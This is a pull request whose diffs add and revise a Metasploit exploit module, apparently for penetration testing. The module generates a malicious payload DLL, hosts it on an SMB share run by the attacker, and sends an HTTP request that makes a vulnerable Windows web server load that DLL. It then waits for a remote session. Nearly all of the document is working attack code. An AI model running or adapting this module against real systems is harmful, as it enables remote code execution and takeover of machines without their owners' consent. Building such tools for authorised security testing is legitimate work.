### PR TITLE
Generic HTTP DLL Injection Exploit Module

### DIFF
--- a/modules/exploits/windows/http/generic_http_dll_server.rb
+++ b/modules/exploits/windows/http/generic_http_dll_server.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::Remote::SMB::Server::Share
   include Msf::Exploit::EXE
 
   def initialize(info={})
@@ -47,37 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
       ))
       register_options(
         [
-          OptString.new('UNCPATH',  [false, 'Override the UNC path to use an existing SMB Server(Ex: \\\\192.168.1.1\\share\\exploit.dll)' ]),
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll']),
           OptString.new('URI',      [true,  'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]),
           OptBool.new('StripExt',   [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]),
         ], self.class)
+      deregister_options('FILE_CONTENTS')
   end
 
-  def start_server 
-    if (datastore['UNCPATH'])
-      @unc = datastore['UNCPATH']
-      print_status("Remember to share the malicious DLL payload as #{@unc}")
-    else
-      print_status("Generating our malicious dll...")
-      exe = generate_payload_dll
-
-      @exe_file = rand_text_alpha(7) + ".dll"
-      @share = rand_text_alpha(5)
-
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-      @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
-      vprint_status("About to start SMB Server on: " + @unc)
-      # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
-      start_smb_server(@unc, exe, @exe_file)
-    end
-  end
-
-  def exploit
-    start_server
+  def primer 
+    self.exe_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
     if datastore['StripExt']
-      share = "#{@unc}".gsub(/\.dll/,'')
+      share = "#{unc}".gsub(/\.dll/,'')
     else
-      share = "#{@unc}"
+      share = "#{unc}"
     end
     print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
 
@@ -92,8 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Wait 30 seconds for session to be created
     1.upto(30) do
       break if session_created?
-      select(nil, nil, nil, 1)
-      handler
+      sleep(1) 
     end
     disconnect
   end

--- a/modules/exploits/windows/http/generic_http_dll_server.rb
+++ b/modules/exploits/windows/http/generic_http_dll_server.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       share = "#{@unc}"
     end
-    print_status("Injecting DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{share}")
+    print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
 
     sploit = datastore['URI'] 
     sploit << share
@@ -89,6 +89,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri' => sploit
     }, 5)
 
-    handler    
+    # Wait 30 seconds for session to be created
+    1.upto(30) do
+      break if session_created?
+      select(nil, nil, nil, 1)
+      handler
+    end
+    disconnect
   end
 end

--- a/modules/exploits/windows/http/generic_http_dll_server.rb
+++ b/modules/exploits/windows/http/generic_http_dll_server.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def primer 
-    self.exe_contents = generate_payload_dll
+    self.file_contents = generate_payload_dll
     print_status("File available on #{unc}...")
     if datastore['StripExt']
       share = "#{unc}".gsub(/\.dll/,'')

--- a/modules/exploits/windows/http/generic_http_dllinject.rb
+++ b/modules/exploits/windows/http/generic_http_dllinject.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module
+# to perform an arbitrary DLL injection over SMB
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'DLL Injection over HTTP',
+      'Description'   => %q{
+        This is an example implementation of using the SMBFileServer module
+        to perform DLL injection over SMB via an webserver which 
+        will arbitrarily load a DLL given as an argument (Yes, these exist IRL).
+      },
+      'Author'      => [
+        'Matthew Hall <hallm@sec-1.com>',
+      ],
+      'Platform'       => 'win',
+      'Privileged'     => true,
+      'Arch'         => ARCH_X86, 
+      'References'     =>
+        [
+          [ 'URL', 'http://www.sec-1.com/blog/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Platform'       => [ 'win'],
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
+      ))
+      register_options(
+        [
+          OptString.new('UNCPATH',  [false, 'Override the UNC path to use an existing SMB Server(Ex: \\\\192.168.1.1\\share\\exploit.dll)' ]),
+          OptString.new('URI',      [true,  'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]),
+          OptBool.new('StripExt',   [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]),
+        ], self.class)
+  end
+
+  def start_server 
+    if (datastore['UNCPATH'])
+      @unc = datastore['UNCPATH']
+      print_status("Remember to share the malicious DLL payload as #{@unc}")
+    else
+      print_status("Generating our malicious dll...")
+      exe = generate_payload_dll
+
+      @exe_file = rand_text_alpha(7) + ".dll"
+      @share = rand_text_alpha(5)
+
+      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
+      vprint_status("About to start SMB Server on: " + @unc)
+      # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
+      start_smb_server(@unc, exe, @exe_file)
+    end
+  end
+
+  def exploit
+    start_server
+    if datastore['StripExt']
+      share = "#{@unc}".gsub(/\.dll/,'')
+    else
+      share = "#{@unc}"
+    end
+    print_status("Injecting DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{share}")
+
+    sploit = datastore['URI'] 
+    sploit << share
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => sploit
+    }, 5)
+
+    handler    
+  end
+end

--- a/modules/exploits/windows/http/generic_http_dllinject.rb
+++ b/modules/exploits/windows/http/generic_http_dllinject.rb
@@ -4,7 +4,7 @@
 ##
 
 # This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module
-# to perform an arbitrary DLL injection over SMB
+# to serve an arbitrary DLL over HTTP 
 
 require 'msf/core'
 
@@ -15,11 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'          => 'DLL Injection over HTTP',
+      'Name'          => 'HTTP DLL Server',
       'Description'   => %q{
-        This is an example implementation of using the SMBFileServer module
-        to perform DLL injection over SMB via an webserver which 
-        will arbitrarily load a DLL given as an argument (Yes, these exist IRL).
+          This is a general-purpose module for exploiting conditions where a HTTP request 
+          triggers a DLL load from a specified SMB share. This module serves payloads as 
+          DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would 
+          trigger the load of the DLL.
       },
       'Author'      => [
         'Matthew Hall <hallm@sec-1.com>',


### PR DESCRIPTION
This is an example implementation of using the
Msf::Exploit::Remote::SMBFileServer module to perform
arbitrary DLL injection over SMB.
